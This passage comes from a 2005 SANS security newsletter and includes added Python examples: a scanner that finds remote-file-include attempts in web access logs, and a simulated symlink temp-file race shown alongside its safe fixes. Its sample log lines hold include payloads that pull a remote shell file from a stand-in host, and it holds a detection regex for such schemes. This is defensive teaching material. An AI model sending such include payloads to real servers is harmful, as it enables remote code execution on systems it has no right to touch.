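REMOTE_SCHEME = re.compile(r'^\s*(?:https?|ftps?|php|data|expect):', re.IGNORECASE)

INCLUDE_PARAMS = {"moduleDefaultFile", "dir"}  # SugarCRM index.php, Zeroboard error.php

def rfi_findings(line):
    """Return a list of finding dicts for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches %2568-style double encoding
        reasons = []
        if REMOTE_SCHEME.match(decoded):
            reasons.append("remote scheme")
        if "\x00" in decoded:
            reasons.append("null byte")  # %00 truncated the include path in PHP 4, hiding an appended suffix
        if not reasons:
            continue
        findings.append({
            "ip": m.group("ip"),
            "status": m.group("status"),
            "param": name,
            "value": decoded.replace("\x00", "\\x00"),
            "reason": ", ".join(reasons),
            "severity": "high" if name in INCLUDE_PARAMS else "review",
        })
    return findings

def scan_log(text):
    """Run rfi_findings over every line and flatten the results."""
    out = []
    for line in text.splitlines():
        out.extend(rfi_findings(line))
    return out

# Constructed sample lines (addresses from the documentation ranges; hosts and paths invented).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2005:10:01:22 -0500] "GET /sugarcrm/index.php?moduleDefaultFile=http://203.0.113.9/c.txt? HTTP/1.1" 200 4521 "-" "Mozilla/4.0"
203.0.113.7 - - [13/Jan/2005:10:01:23 -0500] "GET /zb/error.php?dir=https%3A%2F%2F203.0.113.9%2Fshell.txt%00 HTTP/1.1" 200 311 "-" "Mozilla/4.0"
198.51.100.4 - - [13/Jan/2005:10:02:05 -0500] "GET /sugarcrm/index.php?module=Contacts&action=index HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Jan/2005:10:02:09 -0500] "GET /blog/index.php?p=1&redirect=http%3A%2F%2Fwww.example.com%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""
```

A 200 on a "high" hit is the line to chase: with register_globals on and allow_url_fopen on, that request most likely ran the attacker's PHP. Turning register_globals off, as the Part I item recommends, removes the variable the include() reads; the log check remains useful because it also catches attempts against hosts that were already fixed.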

  • 05.2.33 - CVE: Not Available
  • Platform: Web Application
  • Title: HTML Headline Temporary File Symbolic Link Vulnerabilities
  • Description: HTML Headline is a script for automatically retrieving headlines from various websites. It is reported to be vulnerable to an insecure temporary file issue. An attacker could leverage this using symbolic links to overwrite arbitrary files. Toshiaki Kanosue HTML Headline version 21.8 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12147/info/
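The symlink attack behind 05.2.15 (lprng_certs.sh) and 05.2.33 (HTML Headline), as an added example that is not code from either project: a process writes to a predictable name in a shared directory, an attacker who pre-creates a symlink at that name gets the victim's own file clobbered, and creating the file with O_CREAT|O_EXCL (or tempfile.mkstemp) refuses to follow the planted link. The race is simulated inside a private scratch directory; the file names and contents are constructed.

```python
"""Predictable temp-file names versus atomic creation.

Added example, not from LPRng or HTML Headline. `unsafe_write` is the
pattern both advisories describe; `safe_write` and `safe_write_mkstemp`
are the fixes. `demo` plays the attacker and the victim in turn.
"""
import os
import tempfile

def unsafe_write(path, data):
    # open(path, "w") on a predictable name: O_CREAT without O_EXCL follows
    # a symlink planted at that path and truncates whatever it points to.
    with open(path, "wb") as f:
        f.write(data)

def safe_write(path, data):
    # O_EXCL: fail if anything (regular file or symlink) already exists at path.
    # O_NOFOLLOW where available: never traverse a symlink in the final component.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)

def safe_write_mkstemp(dir_, data):
    # Preferred: let the library pick an unpredictable name and create it atomically, mode 0600.
    fd, path = tempfile.mkstemp(dir=dir_, prefix="lprng_certs.")
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path

def demo():
    """Attacker plants the link first, then the victim writes; compare the two writers."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        victim_file = os.path.join(root, "important.conf")
        with open(victim_file, "wb") as f:
            f.write(b"original contents\n")
        predictable = os.path.join(root, "lprng_certs.tmp")  # name the attacker can guess
        os.symlink(victim_file, predictable)                  # attacker wins the race

        unsafe_write(predictable, b"attacker-chosen contents\n")
        with open(victim_file, "rb") as f:
            results["unsafe_clobbered"] = f.read() == b"attacker-chosen contents\n"

        # Restore the victim file and try the hardened writer against the same planted link.
        with open(victim_file, "wb") as f:
            f.write(b"original contents\n")
        try:
            safe_write(predictable, b"attacker-chosen contents\n")
            results["safe_raised"] = False
        except OSError:   # EEXIST (or ELOOP on some platforms); either way nothing was written
            results["safe_raised"] = True
        with open(victim_file, "rb") as f:
            results["safe_preserved"] = f.read() == b"original contents\n"

        path = safe_write_mkstemp(root, b"certificate data\n")
        results["mkstemp_mode_0600"] = (os.stat(path).st_mode & 0o777) == 0o600
        results["mkstemp_is_regular"] = not os.path.islink(path)
    return results
```

Picking a harder-to-guess name without O_EXCL only narrows the race; the attacker can still spray links at the candidates. Refusing to open anything that already exists, and holding the descriptor rather than the path afterwards, is what closes it.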

  • 05.2.34 - CVE: Not Available
  • Platform: Network Device
  • Title: Multiple Vendor Bluetooth Unauthorized Command Access Vulnerabilities
  • Description: Bluetooth is a short-range wireless communication protocol. It is reported that remote attackers may be able to access affected devices without authorization. The vulnerability is in the handsets' application layer rather than in the Bluetooth protocol itself. Currently the Ericsson T610, Motorola V600, Motorola V80 and Nokia 6310i are reported to be vulnerable.
  • Ref: http://www.thebunker.net/security/bluetooth.htm

  • 05.2.35 - CVE: Not Available
  • Platform: Network Device
  • Title: AirPort Wireless Distribution System Remote Denial of Service
  • Description: Apple AirPort Express and AirPort Extreme base stations are wireless access points. In the Wireless Distribution System mode, AirPort Express and AirPort Extreme base stations are vulnerable to denial of service if there is a connection made to a base station on UDP port 161 and a link state change occurs. Apple AirPort Express Firmware version 6.1 and Apple AirPort Extreme Firmware version 5.5 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/12152/info/

  • 05.2.36 - CVE: Not Available
  • Platform: Hardware
  • Title: Teledat 530 DSL Router Denial of Service
  • Description: The Deutsche Telekom Teledat 530 DSL router fails to handle unspecified character data sent to port 515, which causes the device to crash. The Teledat 530 DSL router is reported to be vulnerable.
  • Ref: http://secunia.com/advisories/9299/

(c) 2005. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

To subscribe, at no cost, go to https://portal.sans.org where you may also request subscriptions to any of SANS other free newsletters.

To change your subscription, address, or other information, visit http://portal.sans.org

Copyright 2005. All rights reserved. No posting or reuse allowed, other than as listed above, without prior written permission.